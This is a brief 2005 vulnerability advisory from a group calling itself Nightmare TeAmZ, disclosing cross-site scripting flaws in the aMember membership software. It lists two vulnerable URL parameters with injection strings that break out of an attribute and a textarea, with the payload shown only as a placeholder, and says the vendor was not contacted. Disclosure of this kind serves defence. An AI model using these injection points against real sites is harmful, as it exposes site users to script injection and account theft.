------------------------------------------------------
      Nightmare TeAmZ Advisory 014
------------------------------------------------------
Date -  11/2005
aMember Xss


AFFECTED PRODUCTS
=================
aMember
http://www.amember.com


OVERVIEW
========
aMember is a flexible membership software with full-featured subscription 
management. It has support for PayPal, 2Checkout, ccBill, AllRepay, 
Clickbank, Authorize.net, WorldPay, LinkPoint, NoChex and other payment 
systems (50+ payment systems currently supported), and allows you to setup 
paid-membership areas on your site. It can be used without any payment 
system - you can manage users manually. It allows you to create different 
subscription types with different prices, periods and access permissions. 
Integrated with phpNuke, vBulletin and InvisionBoard and other scripts


Vulnerable Path Xss :
========
/sendpass.php?lamember_login=">[XSS]
/member.php?login=</textarea>[XSS]


Solution:
=========
1. Venditor Not Contacted


Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk of Nightmare TeAmZ
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0
Site: http://www.NightmareSecurity.net <--IT Security Forum

_________________________________________________________________
Scopri il nuovo MSN Htomail - 10MB di allegati 
http://www.msn.it/hotmail/minisite_10